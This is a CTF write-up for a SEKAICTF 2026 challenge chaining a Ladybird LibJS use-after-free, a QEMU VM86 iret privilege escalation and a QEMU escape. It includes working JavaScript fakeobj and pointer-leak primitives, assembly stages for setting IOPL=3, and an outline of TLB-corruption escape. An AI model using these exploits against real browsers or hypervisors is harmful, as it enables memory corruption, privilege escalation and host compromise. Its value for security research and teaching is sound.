SEKAICTF 2026: 3in1

Qyn #ctf #sekaictf #kernel #pwn

A full-chain SEKAICTF 2026 challenge covering Ladybird, a QEMU LPE, and a QEMU escape.


With a clear decline in competitiveness across the board for CTFs now that AI has taken over, we decided to make some harder challenges this year.
So I’ve created two challenges for SEKAICTF this year, starting with a full chain that combines two 0days and a new way to exploit an n-day with fewer primitives than previous researchers from ottersec had.

Components

  • Ladybird
  • QEMU LPE
  • QEMU escape

3in1: Ladybird


Ladybird 0day

The first part of the challenge is to escape the Ladybird LibJS shell. This requires a 0day, since we’re running pretty much the latest version. I had been planning to do a LibJS challenge for a while, since I had been hoarding a 0day for over a year (ever since I previously saw a Ladybird challenge). Sadly, it was patched some time before the CTF started.

Another funny thing happened two weeks before the CTF: when the LibJS (Ladybird) part was already done, a commit dropped that killed my original exploitation technique for this new bug.

Bug

Since our last 0day has been patched, we have to find a new one. For the challenge itself, I patched out all the internal functions except gc() (I was feeling nice) and compiled a JS-only shell.

The intended bug for this challenge lies in Set.prototype.intersection:

SetPrototype.cpp
// 24.2.4.9 Set.prototype.intersection ( other ), https://tc39.es/ecma262/#sec-set.prototype.intersection
JS_DEFINE_NATIVE_FUNCTION(SetPrototype::intersection)
{
    auto& realm = *vm.current_realm();
    // 1. Let O be the this value.
    // 2. Perform ? RequireInternalSlot(O, [[SetData]]).
    auto set = TRY(typed_this_object(vm));
    // 3. Let otherRec be ? GetSetRecord(other).
    auto other_record = TRY(get_set_record(vm, vm.argument(0)));
    // 4. Let resultSetData be a new empty List.
    auto result = Set::create(realm);
    // 5. If SetDataSize(O.[[SetData]]) ≤ otherRec.[[Size]], then
    if (set->set_size() <= other_record.size) {
        // a. Let thisSize be the number of elements in O.[[SetData]].
        // b. Let index be 0.
        // c. Repeat, while index < thisSize,
        for (auto const& element : *set) { // [1]. BUG
            // i. Let e be O.[[SetData]][index].
            // ii. Set index to index + 1.
            // iii. If e is not empty, then
            // 1. Let inOther be ToBoolean(? Call(otherRec.[[Has]], otherRec.[[SetObject]], « e »)).
            auto in_other = TRY(call(vm, *other_record.has, other_record.set_object, element.key)).to_boolean();
            // 2. If inOther is true, then
            if (in_other) {
                // a. NOTE: It is possible for earlier calls to otherRec.[[Has]] to remove and re-add an element of O.[[SetData]], which can cause the same element to be visited twice during this iteration.
                // b. If SetDataHas(resultSetData, e) is false, then
                if (!set_data_has(result, element.key)) {
                    // i. Append e to resultSetData.
                    result->set_add(element.key);
                }
            }
            // 3. NOTE: The number of elements in O.[[SetData]] may have increased during execution of otherRec.[[Has]].
            // 4. Set thisSize to the number of elements in O.[[SetData]].
        }
    }
    // 6. Else,
    else {
        // a. Let keysIter be ? GetIteratorFromMethod(otherRec.[[SetObject]], otherRec.[[Keys]]).
        auto keys_iterator = TRY(get_iterator_from_method(vm, other_record.set_object, other_record.keys));
        // b. Let next be NOT-STARTED.
        Optional<Value> next;
        // c. Repeat, while next is not DONE,
        do {
            // i. Set next to ? IteratorStepValue(keysIter).
            next = TRY(iterator_step_value(vm, keys_iterator));
            // ii. If next is not DONE, then
            if (next.has_value()) {
                // 1. Set next to CanonicalizeKeyedCollectionKey(next).
                next = canonicalize_keyed_collection_key(*next);
                // 2. Let inThis be SetDataHas(O.[[SetData]], next).
                auto in_this = set_data_has(set, *next);
                // 3. If inThis is true, then
                if (in_this) {
                    // a. NOTE: Because other is an arbitrary object, it is possible for its "keys" iterator to produce the same value more than once.
                    // b. If SetDataHas(resultSetData, next) is false, then
                    if (!set_data_has(result, *next)) {
                        // i. Append next to resultSetData.
                        result->set_add(*next);
                    }
                }
            }
        } while (next.has_value());
    }
    // 7. Let result be OrdinaryObjectCreate(%Set.prototype%, « [[SetData]] »).
    // 8. Set result.[[SetData]] to resultSetData.
    // 9. Return result.
    return result;
}

The bug here is auto const& element : *set, where element is not a copy, but a reference into the backing store of the set. A Set in LibJS is backed by a Map:

Set.h
class JS_API Set : public Object {
    JS_OBJECT(Set, Object);
    GC_DECLARE_ALLOCATOR(Set);

public:
    static GC::Ref<Set> create(Realm&);
    virtual void initialize(Realm&) override;
    virtual ~Set() override = default;
    virtual bool is_set_object() const final { return true; }
    // NOTE: Unlike what the spec says, we implement Sets using an underlying map,
    //       so all the functions below do not directly implement the operations as
    //       defined by the specification.
    void set_clear() { m_values->map_clear(); }
    bool set_remove(Value const& value) { return m_values->map_remove(value); }
    bool set_has(Value const& key) const { return m_values->map_has(key); }
    void set_add(Value const& key) { m_values->map_set(key, js_undefined()); }
    size_t set_size() const { return m_values->map_size(); }
    auto begin() const { return const_cast<Map const&>(*m_values).begin(); }
    auto begin() { return m_values->begin(); }
    auto end() const { return m_values->end(); }
    GC::Ref<Set> copy() const;

private:
    explicit Set(Object& prototype);
    virtual void visit_edges(Visitor& visitor) override;
    GC::Ptr<Map> m_values;
};
// 24.2.1.1 Set Records, https://tc39.es/ecma262/#sec-set-records
struct SetRecord {
    GC::Ref<Object const> set_object; // [[SetObject]]
    double size { 0 };                // [[Size]]
    GC::Ref<FunctionObject> has;      // [[Has]]
    GC::Ref<FunctionObject> keys;     // [[Keys]]
};

Here set_clear() forwards to the Map’s map_clear(), which basically frees its backing HashTable.

So an easy PoC for this is:

let key = {};
let s = new Set([key]);
let other = {
    size: 1,
    has() {
        s.clear(); // frees/replaces storage being iterated
        return true;
    },
    keys() {
        return [][Symbol.iterator]();
    },
};
let result = s.intersection(other);
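Note (where we mimic a Set): other only has to look like a Set, because GetSetRecord accepts any object with a numeric size and callable has and keys.
Set.cpp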
// 24.2.1.2 GetSetRecord ( obj ), https://tc39.es/ecma262/#sec-getsetrecord
ThrowCompletionOr<SetRecord> get_set_record(VM& vm, Value value)
{
    // 1. If obj is not an Object, throw a TypeError exception.
    if (!value.is_object())
        return vm.throw_completion<TypeError>(ErrorType::NotAnObject, value);
    auto const& object = value.as_object();
    // 2. Let rawSize be ? Get(obj, "size").
    auto raw_size = TRY(object.get(vm.names.size));
    // 3. Let numSize be ? ToNumber(rawSize).
    auto number_size = TRY(raw_size.to_number(vm));
    // 4. NOTE: If rawSize is undefined, then numSize will be NaN.
    // 5. If numSize is NaN, throw a TypeError exception.
    if (number_size.is_nan())
        return vm.throw_completion<TypeError>(ErrorType::NumberIsNaN, "size"sv);
    // 6. Let intSize be ! ToIntegerOrInfinity(numSize).
    auto integer_size = MUST(number_size.to_integer_or_infinity(vm));
    // 7. If intSize < 0, throw a RangeError exception.
    if (integer_size < 0)
        return vm.throw_completion<RangeError>(ErrorType::NumberIsNegative, "size"sv);
    // 8. Let has be ? Get(obj, "has").
    auto has = TRY(object.get(vm.names.has));
    // 9. If IsCallable(has) is false, throw a TypeError exception.
    if (!has.is_function())
        return vm.throw_completion<TypeError>(ErrorType::NotAFunction, has);
    // 10. Let keys be ? Get(obj, "keys").
    auto keys = TRY(object.get(vm.names.keys));
    // 11. If IsCallable(keys) is false, throw a TypeError exception.
    if (!keys.is_function())
        return vm.throw_completion<TypeError>(ErrorType::NotAFunction, keys);
    // 12. Return a new Set Record { [[SetObject]]: obj, [[Size]]: intSize, [[Has]]: has, [[Keys]]: keys }.
    return SetRecord { .set_object = object, .size = integer_size, .has = has.as_function(), .keys = keys.as_function() };
}

This gives us a free UaF on element.key, which for a Set backed by a Map is the stored object itself.
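To make the hazard concrete without touching LibJS, here is a memory-safe toy model in plain JavaScript. Everything in it (ToySet, intersectionByReference, intersectionByCopy, the "RECLAIMED" marker) is invented for illustration: the slot object stands in for the `auto const& element` reference, and overwriting it in clear() stands in for the freed table being reused. The copying variant is only one possible way to avoid the stale read in this model, not the actual upstream patch.

```javascript
// Toy model only: a "set" whose entries live in a replaceable backing array.
class ToySet {
  constructor(keys) {
    this.storage = keys.map((key) => ({ key }));
  }
  clear() {
    // Model the old table being freed and its memory reused by someone else.
    for (const slot of this.storage) slot.key = "RECLAIMED";
    this.storage = [];
  }
}

// Mirrors the buggy loop: `slot` plays the role of `auto const& element`.
function intersectionByReference(set, other) {
  const result = [];
  for (const slot of set.storage) {
    if (other.has(slot.key)) {
      result.push(slot.key); // this read happens after the callback ran
    }
  }
  return result;
}

// Copying the key before the callback keeps the original value.
function intersectionByCopy(set, other) {
  const result = [];
  for (const slot of [...set.storage]) {
    const key = slot.key;
    if (other.has(key)) result.push(key);
  }
  return result;
}

const s1 = new ToySet(["secret"]);
const stale = intersectionByReference(s1, { has() { s1.clear(); return true; } });

const s2 = new ToySet(["secret"]);
const safe = intersectionByCopy(s2, { has() { s2.clear(); return true; } });

console.log(stale, safe);
```

In the real engine the stale read does not yield a harmless marker string; it yields whatever bytes now occupy the freed bucket, interpreted as a Value.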

Exploit

The first primitive we can easily create from this is fakeobj:

function fakeobj(addr) {
    let encoded = OBJECT_TAG | (addr & PAYLOAD_MASK);
    let payload_b64 = encoded_value_payload(encoded);
    let keep = [];
    let key = {};
    let s = new Set([key]);
    let other = {
        size: 1,
        has() {
            s.clear();
            let scratch = new Uint8Array(FAKEOBJ_RECLAIM_SIZE);
            let dv = new DataView(scratch.buffer);
            scratch.setFromBase64(payload_b64);
            keep.push(scratch);
            return true;
        },
        keys() {
            return [][Symbol.iterator]();
        }
    };
    return Array.from(s.intersection(other))[0];
}

(See footnote 1.)
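The fakeobj snippet relies on encoded_value_payload, which is not shown. A minimal sketch of one plausible shape follows, assuming the helper simply sprays the 8-byte encoded Value (little-endian) across the reclaim buffer and returns it as base64. The value of FAKEOBJ_RECLAIM_SIZE, the extra `size` parameter, and the use of btoa are assumptions made for this sketch; a bare JS shell may need a different base64 encoder.

```javascript
// Hypothetical size; the real value has to match the freed bucket allocation.
const FAKEOBJ_RECLAIM_SIZE = 64;

// Assumed behavior: repeat the encoded 64-bit Value over the whole buffer.
function encoded_value_payload(encoded, size = FAKEOBJ_RECLAIM_SIZE) {
  const bytes = new Uint8Array(size);
  const view = new DataView(bytes.buffer);
  for (let off = 0; off + 8 <= size; off += 8) {
    view.setBigUint64(off, BigInt.asUintN(64, encoded), true); // little-endian
  }
  let binary = "";
  for (const b of bytes) binary += String.fromCharCode(b);
  return btoa(binary); // assumes a global btoa is available
}

console.log(encoded_value_payload(0x1122334455667788n, 16));
```

Preparing the base64 string ahead of time means the callback only has to allocate the typed array and decode into it.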

For a leak we do the following:

function leak_ptr_try_for(candidates, iter) {
    let keep = [];
    let set_key = { set_key: iter };
    let s = new Set([set_key]);
    let other = {
        size: 1,
        has() {
            s.clear(); // [1]
            gc();
            for (let j = 0; j < 192; ++j) {
                let wm = new WeakMap();
                wm.set(candidates[(iter + j) % candidates.length], 0x1337);
                keep.push(wm);
            }
            return true;
        },
        keys() {
            return [][Symbol.iterator]();
        },
    };
    let v = Array.from(s.intersection(other))[0];
    if (typeof v !== "number" || v === 0)
        return 0n;
    let bits = f64_to_u64(v);
    if (!looks_like_ptr(bits))
        return 0n;
    return bits;
}

This frees the backing buckets at [1], runs gc(), and creates WeakMaps whose backing store overlaps with the old Set storage.

Just like a regular Set, a WeakMap is backed by a HashMap, but here it is HashMap<GC::Ptr<Cell>, Value> m_values instead of the HashMap<Value, Value, ValueTraits> m_entries used by a Map (and therefore by a Set).

So we try to reclaim a Value from the Set (8 bytes) with a GC::Ptr<Cell> from the WeakMap (also 8 bytes, a raw pointer). Reinterpreted as a Value, that pointer reads as an f64, which gives us the leak.

This is basically our addrOf primitive, which we can use to target an ArrayBuffer as the victim.
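The leak routine uses f64_to_u64 and looks_like_ptr, and later snippets use u64ToF64, none of which are shown. A minimal sketch of such helpers, assuming a little-endian target: the conversions are plain bit reinterpretation through a shared DataView, while the pointer heuristic (non-null, 8-byte aligned, below 2^47) is a guess made for this sketch and not necessarily what the original solver checks.

```javascript
// One shared 8-byte scratch buffer for bit reinterpretation.
const conv = new DataView(new ArrayBuffer(8));

function f64_to_u64(f) {
  conv.setFloat64(0, f, true);
  return conv.getBigUint64(0, true);
}

function u64ToF64(u) {
  conv.setBigUint64(0, BigInt.asUintN(64, u), true);
  return conv.getFloat64(0, true);
}

// Hypothetical heuristic: non-null, 8-byte aligned, inside the 47-bit user address space.
function looks_like_ptr(bits) {
  return bits !== 0n && (bits & 7n) === 0n && bits < (1n << 47n);
}

const sample = 0x00007f1234567890n; // made-up pointer-like value
console.log(f64_to_u64(u64ToF64(sample)).toString(16), looks_like_ptr(sample));
```

A userspace pointer has zero exponent bits, so as a double it is a tiny subnormal number; that is why the leak routine checks `typeof v === "number"` before converting.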

From here there are many ways to turn read/write into code execution. Here is one example:

let map = new Map();
map.set(bucket0, u64ToF64(MAP_FAKE_HEADER));
map.set(bucket1, u64ToF64(validationAddr));
let iterator = map.entries();
iterator.a = u64ToF64(MAP_FAKE_HEADER);

Here bucket0 and bucket1 are chosen so that their hashes land in the first and second bucket respectively. Then we leak the MapIterator object and reinterpret its memory as follows:

| Real memory address | Real MapIterator field                                               | Fake reader   | JS::Object field   |
|---------------------|----------------------------------------------------------------------|---------------|--------------------|
| I + 0x28            | Object::m_private_elements                                           | reader + 0x00 | vptr-ish word      |
| I + 0x30            | Object::m_inline_named_storage[0] == iterator.a == MAP_FAKE_HEADER   | reader + 0x08 | flags/kind/length  |
| I + 0x38            | Object::m_inline_named_storage[1]                                    | reader + 0x10 | m_shape            |
| I + 0x40            | BuiltinIterator vptr                                                 | reader + 0x18 | m_named_properties |
| I + 0x48            | MapIterator::m_map                                                   | reader + 0x20 | m_indexed_elements |
| I + 0x50            | m_done / m_iteration_kind                                            | reader + 0x28 | m_private_elements |
| I + 0x58            | MapIterator::m_iterator                                              | reader + 0x30 | inline storage     |

So now we can read, for example, reader[13] == reader->m_indexed_elements[13] == iterator->m_map[13]. From this we can recover the bucket address (bucket == reader[13]) and read/write into the buckets array, which has the following layout:

+0x00 bucket0 Entry.key/
+0x08 bucket0 Entry.value = header == flags/kind/length
+0x10 bucket1 state/hash/padding
+0x18 bucket1 Entry.key
+0x20 bucket1 Entry.value = target pointer == m_indexed_elements

Then we can fakeobj over bucket+8 to mirror the MapIterator trick from before and get a limited read/write by overwriting m_indexed_elements using map.set(bucket1, u64ToF64(addr)). From there we repeatedly target an ArrayBuffer’s data pointer to get full arbitrary read/write. Finally, we leak the vtable, get libc, read environ, find a return address on the stack, and ROP to execve to run our next stage.

Footnotes

  1. We go through base64 so that we do not accidentally reclaim the freed storage with other objects.

3in1: QEMU LPE


Escalating privileges inside QEMU through a VM86 iret bug.

For the second part of the challenge, we need to somehow gain root (or at least higher privileges) to talk to the virtio-snd device. Because I’ve been hoarding a 0day for this as well for a little while, it was a perfect fit for this challenge. Although a 0day has already been published (without patches) by kqx, the challenge introduces a patch for it, so we have to hunt for a new one.

Bug

The bug is actually a slight variant of https://kqx.io/post/qemu-nday/ but the primitive is even better:

seg_helper.c
/* protected mode iret */
static inline void helper_ret_protected(CPUX86State *env, int shift,
int is_iret, int addend,
uintptr_t retaddr)
{
uint32_t new_cs, new_eflags, new_ss;
uint32_t new_es, new_ds, new_fs, new_gs;
uint32_t e1, e2, ss_e1, ss_e2;
int cpl, dpl, rpl, eflags_mask, iopl;
target_ulong new_eip, new_esp;
StackAccess sa;
cpl = env->hflags & HF_CPL_MASK;
sa.env = env;
sa.ra = retaddr;
sa.mmu_index = x86_mmu_index_pl(env, cpl);
#ifdef TARGET_X86_64
if (shift == 2) {
sa.sp_mask = -1;
} else
#endif
{
sa.sp_mask = get_sp_mask(env->segs[R_SS].flags);
}
sa.sp = env->regs[R_ESP];
sa.ss_base = env->segs[R_SS].base;
new_eflags = 0; /* avoid warning */
#ifdef TARGET_X86_64
if (shift == 2) {
new_eip = popq(&sa);
new_cs = popq(&sa) & 0xffff;
if (is_iret) {
new_eflags = popq(&sa);
}
} else
#endif
{
if (shift == 1) {
/* 32 bits */
new_eip = popl(&sa);
new_cs = popl(&sa) & 0xffff;
if (is_iret) {
new_eflags = popl(&sa);
if (new_eflags & VM_MASK) {
goto return_to_vm86;
}
}
} else {
/* 16 bits */
new_eip = popw(&sa);
new_cs = popw(&sa);
if (is_iret) {
new_eflags = popw(&sa);
}
}
}
LOG_PCALL("lret new %04x:" TARGET_FMT_lx " s=%d addend=0x%x\n",
new_cs, new_eip, shift, addend);
LOG_PCALL_STATE(env_cpu(env));
if ((new_cs & 0xfffc) == 0) {
raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, retaddr);
}
if (load_segment_ra(env, &e1, &e2, new_cs, retaddr) != 0) {
raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, retaddr);
}
if (!(e2 & DESC_S_MASK) ||
!(e2 & DESC_CS_MASK)) {
raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, retaddr);
}
rpl = new_cs & 3;
if (rpl < cpl) {
raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, retaddr);
}
dpl = (e2 >> DESC_DPL_SHIFT) & 3;
if (e2 & DESC_C_MASK) {
if (dpl > rpl) {
raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, retaddr);
}
} else {
if (dpl != rpl) {
raise_exception_err_ra(env, EXCP0D_GPF, new_cs & 0xfffc, retaddr);
}
}
if (!(e2 & DESC_P_MASK)) {
raise_exception_err_ra(env, EXCP0B_NOSEG, new_cs & 0xfffc, retaddr);
}
sa.sp += addend;
if (rpl == cpl && (!(env->hflags & HF_CS64_MASK) ||
((env->hflags & HF_CS64_MASK) && !is_iret))) {
/* return to same privilege level */
cpu_x86_load_seg_cache(env, R_CS, new_cs,
get_seg_base(e1, e2),
get_seg_limit(e1, e2),
e2);
} else {
/* return to different privilege level */
#ifdef TARGET_X86_64
if (shift == 2) {
new_esp = popq(&sa);
new_ss = popq(&sa) & 0xffff;
} else
#endif
{
if (shift == 1) {
/* 32 bits */
new_esp = popl(&sa);
new_ss = popl(&sa) & 0xffff;
} else {
/* 16 bits */
new_esp = popw(&sa);
new_ss = popw(&sa);
}
}
LOG_PCALL("new ss:esp=%04x:" TARGET_FMT_lx "\n",
new_ss, new_esp);
if ((new_ss & 0xfffc) == 0) {
#ifdef TARGET_X86_64
/* NULL ss is allowed in long mode if cpl != 3 */
/* XXX: test CS64? */
if ((env->hflags & HF_LMA_MASK) && rpl != 3) {
cpu_x86_load_seg_cache(env, R_SS, new_ss,
0, 0xffffffff,
DESC_G_MASK | DESC_B_MASK | DESC_P_MASK |
DESC_S_MASK | (rpl << DESC_DPL_SHIFT) |
DESC_W_MASK | DESC_A_MASK);
ss_e2 = DESC_B_MASK; /* XXX: should not be needed? */
} else
#endif
{
raise_exception_err_ra(env, EXCP0D_GPF, 0, retaddr);
}
} else {
if ((new_ss & 3) != rpl) {
raise_exception_err_ra(env, EXCP0D_GPF, new_ss & 0xfffc, retaddr);
}
if (load_segment_ra(env, &ss_e1, &ss_e2, new_ss, retaddr) != 0) {
raise_exception_err_ra(env, EXCP0D_GPF, new_ss & 0xfffc, retaddr);
}
if (!(ss_e2 & DESC_S_MASK) ||
(ss_e2 & DESC_CS_MASK) ||
!(ss_e2 & DESC_W_MASK)) {
raise_exception_err_ra(env, EXCP0D_GPF, new_ss & 0xfffc, retaddr);
}
dpl = (ss_e2 >> DESC_DPL_SHIFT) & 3;
if (dpl != rpl) {
raise_exception_err_ra(env, EXCP0D_GPF, new_ss & 0xfffc, retaddr);
}
if (!(ss_e2 & DESC_P_MASK)) {
raise_exception_err_ra(env, EXCP0B_NOSEG, new_ss & 0xfffc, retaddr);
}
cpu_x86_load_seg_cache(env, R_SS, new_ss,
get_seg_base(ss_e1, ss_e2),
get_seg_limit(ss_e1, ss_e2),
ss_e2);
}
cpu_x86_load_seg_cache(env, R_CS, new_cs,
get_seg_base(e1, e2),
get_seg_limit(e1, e2),
e2);
sa.sp = new_esp;
#ifdef TARGET_X86_64
if (env->hflags & HF_CS64_MASK) {
sa.sp_mask = -1;
} else
#endif
{
sa.sp_mask = get_sp_mask(ss_e2);
}
/* validate data segments */
validate_seg(env, R_ES, rpl);
validate_seg(env, R_DS, rpl);
validate_seg(env, R_FS, rpl);
validate_seg(env, R_GS, rpl);
sa.sp += addend;
}
SET_ESP(sa.sp, sa.sp_mask);
env->eip = new_eip;
if (is_iret) {
/* NOTE: 'cpl' is the _old_ CPL */
eflags_mask = TF_MASK | AC_MASK | ID_MASK | RF_MASK | NT_MASK;
if (cpl == 0) {
eflags_mask |= IOPL_MASK;
}
iopl = (env->eflags >> IOPL_SHIFT) & 3;
if (cpl <= iopl) {
eflags_mask |= IF_MASK;
}
if (shift == 0) {
eflags_mask &= 0xffff;
}
cpu_load_eflags(env, new_eflags, eflags_mask);
}
return;
return_to_vm86:
new_esp = popl(&sa);
new_ss = popl(&sa);
new_es = popl(&sa);
new_ds = popl(&sa);
new_fs = popl(&sa);
new_gs = popl(&sa);
/* modify processor state */
cpu_load_eflags(env, new_eflags, TF_MASK | AC_MASK | ID_MASK |
IF_MASK | IOPL_MASK | VM_MASK | NT_MASK | VIF_MASK |
VIP_MASK);
load_seg_vm(env, R_CS, new_cs & 0xffff);
load_seg_vm(env, R_SS, new_ss & 0xffff);
load_seg_vm(env, R_ES, new_es & 0xffff);
load_seg_vm(env, R_DS, new_ds & 0xffff);
load_seg_vm(env, R_FS, new_fs & 0xffff);
load_seg_vm(env, R_GS, new_gs & 0xffff);
env->eip = new_eip & 0xffff;
env->regs[R_ESP] = new_esp;
}

The issue here is that QEMU jumps to return_to_vm86 as soon as EFLAGS.VM is set in the popped frame, before rejecting this transition from user mode. return_to_vm86 then loads EFLAGS with both VM_MASK and IOPL_MASK in the update mask, so we can set IOPL=3, which in QEMU again gives arbitrary physical read/write. Amazing work from the kqx people.
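The effect of the two update masks can be checked with a few lines of arithmetic. The sketch below is a simplified model, not QEMU code: loadEflags only mimics the masking behavior of cpu_load_eflags (bits inside the mask come from the frame, the rest are kept), normalIretMask copies the mask computation from the end of helper_ret_protected for a 32-bit iret, and VM86_MASK copies the mask used at the return_to_vm86 label. The mask constants are the architectural EFLAGS bit positions; the function names are made up.

```javascript
// x86 EFLAGS bit masks (architectural values).
const TF_MASK = 0x100, IF_MASK = 0x200, IOPL_MASK = 0x3000, NT_MASK = 0x4000;
const RF_MASK = 0x10000, VM_MASK = 0x20000, AC_MASK = 0x40000;
const VIF_MASK = 0x80000, VIP_MASK = 0x100000, ID_MASK = 0x200000;

// Simplified model: only bits in `mask` are taken from the frame value.
function loadEflags(oldFlags, frameFlags, mask) {
  return ((oldFlags & ~mask) | (frameFlags & mask)) >>> 0;
}

// Mask built on the ordinary protected-mode iret path (32-bit operand size).
function normalIretMask(cpl, oldFlags) {
  let mask = TF_MASK | AC_MASK | ID_MASK | RF_MASK | NT_MASK;
  if (cpl === 0) mask |= IOPL_MASK;
  const oldIopl = (oldFlags >> 12) & 3;
  if (cpl <= oldIopl) mask |= IF_MASK;
  return mask;
}

// Mask used at the return_to_vm86 label, regardless of CPL.
const VM86_MASK = TF_MASK | AC_MASK | ID_MASK | IF_MASK | IOPL_MASK |
                  VM_MASK | NT_MASK | VIF_MASK | VIP_MASK;

const userFlags = 0x202;       // typical user mode value: IF set, IOPL=0
const frameFlags = 0x00023002; // attacker frame: VM=1, IOPL=3, bit 1 set

const viaNormal = loadEflags(userFlags, frameFlags, normalIretMask(3, userFlags));
const viaVm86 = loadEflags(userFlags, frameFlags, VM86_MASK);

const ioplOf = (flags) => (flags >> 12) & 3;
console.log(ioplOf(viaNormal), ioplOf(viaVm86), viaVm86.toString(16));
```

With CPL 3 the ordinary mask never contains IOPL_MASK, so the frame cannot raise IOPL there; the VM86 mask contains it unconditionally.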

Exploit

What happens is easiest to follow by walking through the full exploit path:

; ============================================================
; Stage 0: normal 64-bit userland
; CS = 0x33, RIP = inside child_iopl_probe()
; ============================================================
pushq 0x23 ; USER32_CS, Linux 32-bit compat code selector
pushq 0x00100000 ; 32-bit entrypoint
lretq ; far return: pop RIP/EIP + CS
; Now:
; CS = 0x23
; EIP = 0x00100000
; Execution is 32-bit compat code.
; ============================================================
; Stage 1: 32-bit compat stub at 0x00100000
; ============================================================
[BITS 32]
mov esp, 0x00022000
push 0x00001000 ; GS for VM86
push 0x00001000 ; FS for VM86
push 0x00001000 ; DS for VM86
push 0x00001000 ; ES for VM86
push 0x00002000 ; SS for VM86
push 0x00008000 ; ESP for VM86
push 0x00023002 ; EFLAGS: VM=1, IOPL=3, bit1=1
push 0x00001000 ; CS for VM86
push 0x00000000 ; EIP for VM86
iretd ; opcode 0xcf
; QEMU sees VM=1 in the iret frame and takes return_to_vm86
; which loads IOPL from attacker-controlled EFLAGS
;
; Now:
; VM86 mode
; CS:IP = 0x1000:0x0000
; linear RIP = 0x10000
; SS:SP = 0x2000:0x8000
; EFLAGS has IOPL=3
; ============================================================
; Stage 2: VM86 code at 0x00010000
; ============================================================
[BITS 16]
mov ax, 0x3000
mov ds, ax ; DS base = 0x3000 << 4 = 0x30000
o32 mov eax, 20 ; i386 syscall number 20 = getpid
o32 mov ebp, 0x00028100 ; landing_stack
o32 mov esp, 0x00028100 ; landing_stack
sysenter ; enter Linux compat syscall path
; ============================================================
; Stage 3: Linux compat sysenter return path
; It returns to a patched vDSO landing pad.
; we overwrite that pad with:
; ============================================================
[BITS 32]
pop ebp ; consumes 0x41414141
pop edx ; consumes 0x42424242
pop ecx ; consumes 0x43434343
ret ; returns to after32
; landing_stack contains:
; [0x28100] = 0x41414141
; [0x28104] = 0x42424242
; [0x28108] = 0x43434343
; [0x2810c] = after32
; ============================================================
; Stage 4: after32, same linear page, now 32-bit compat mode
; ============================================================
[BITS 32]
mov ax, 0x2b ; USER_DS
mov ds, ax
pushfd
pop eax
push 0x33 ; USER64_CS
push 0x00101000 ; 64-bit stub address
retf ; far return back to 64-bit user code
; Now:
; CS = 0x33
; RIP = 0x00101000
; ============================================================
; Stage 5: 64-bit stub at 0x00101000
; ============================================================
[BITS 64]
mov rsp, safe_rsp
mov rax, after_iopl
jmp rax
; ============================================================
; Stage 6: normal 64-bit C again, but with IOPL=3
; ============================================================
pushfq
pop rax ; qemu_prim.c checks IOPL bits
cli
sti ; succeeds only if IOPL=3

After that, we use the kqx.io technique to obtain physical read/write.
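The segment values in stages 1 and 2 follow the usual VM86 addressing rule, where the linear address is the 16-bit segment shifted left by four plus the 16-bit offset. A small sketch to check the numbers quoted in the assembly comments (vm86Linear is a helper name made up here):

```javascript
// VM86, like real mode, computes linear = (segment << 4) + offset.
function vm86Linear(segment, offset) {
  return (((segment & 0xffff) << 4) + (offset & 0xffff)) >>> 0;
}

const codeLinear = vm86Linear(0x1000, 0x0000);  // CS:IP after the iretd
const stackLinear = vm86Linear(0x2000, 0x8000); // SS:SP after the iretd
const dataBase = vm86Linear(0x3000, 0x0000);    // DS base set in stage 2

console.log(codeLinear.toString(16), stackLinear.toString(16), dataBase.toString(16));
```

This matches the comments in the listing: the VM86 code runs at linear 0x10000 and DS has base 0x30000.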

Aftermath

After the CTF I was told that there was already some public work on this specific bug: https://patchew.org/QEMU/20260528113808.86036-1-misetic@osec.io/ and https://lore.kernel.org/qemu-devel/20260622082119.11903-1-apolivodaa433@gmail.com/

Thankfully the bug wasn’t patched in time for the CTF :)

3in1: QEMU Escape


Escaping QEMU by targeting the TCG software TLB from virtio-snd.

Finally we get to exploit QEMU. A different patch reintroduces a bug previously exploited by ottersec. Before reading the next part, I recommend reading their writeup to get an understanding of the problem, as I’ll only go over the exploitation of that bug.

Anyway, ottersec needed another device driver to escape the guest. This challenge doesn’t give you this luxury and you have to exploit (escape) the guest without it.

Another fun thing about this challenge: the kernel is compiled with a minimal configuration and doesn’t expose any of the functionality required to actually talk to the driver. You have to create this yourself (if you even need it; more on this later).

For this challenge, I’ll go over two ways to exploit this: the original intended path, and another (less intended) path created by an unnamed entity during the game that just happened to fall into my hands.

Intended Exploit

First of all, credit for the exploitation idea goes to the DiceCTF bassoon writeup:

Note (Bassoon writeup)

first part is getting consistent heap corruption primitives using the fact that all 7 0x100 tcache entries are almost always contiguous. from here you can get overlapping chunks and prepare a UAF write. next part is figuring out what structure to actually target. we don’t have partial overwrite which forces us to target something that gets allocated after our corruption, and prevents us from dealing with things containing absolute addresses. most important things are allocated in the main heap, and the thread heap is mostly used by TCG.

there may be multiple approaches, but my solution is to overwrite entries in the TCG fast path CPUTLBEntry table, which basically implements the TLB for guest virtual to host virtual address translation. it gets reallocd on the thread heap in tlb_mmu_resize_locked which gets triggered either periodically from tlb_flush_by_mmuidx_async_work which we can’t control very well, or on a single page flush if the page is a large (huge) page. we can thus flush a huge page with invlpg to trigger resizing. the new size is based on a rate calculated within a 100 ms window, so we want to busy loop at cpl0 after the first flush to get a low rate and downsize the table.

there are tables for each mmu_idx type, which is an arch-based classifier. for x64, there are 3 main ones: usermode, kernel mode, and kernel mode running usermode code through SMAP. you could simplify the exploitation by doing it all through one mmu_idx so you don’t need to context switch to trigger TLB activity between invlpg’ing, but i just did it with the usermode TLB anyway and had a kernel module that let me call my own userspace functions at cpl0. the noise taming part is very difficult, since TCG is constantly allocating chunks of 0x28 to insert nodes into qtree during TCG translation within tb_gen_code (called for each basic block). we get around this by stuffing all of our important operations for triggering heap activity like the intel HDA writes and invlpgs into single basic blocks at a time.

we get overlapping chunks and free a size 0x810 for the fast TLB to reclaim when it downsizes to minimum size of 0x40 (0x20 size per entry). each entry in the table has 3 virtual addresses and one addend. the virtual addresses correspond to the guest virtual addresses translations for read, write, and code accesses, and the addend gets added to the virtual address to calculate the host address. we can’t control the addend usefully without leaks, but we can overwrite the virtual address, and the difference between our overwritten one and the old one effectively gets added to the addend during translation. this is how we are able to get reliable memory corruption leaklessly, and i think it’s a pretty cool and novel technique.

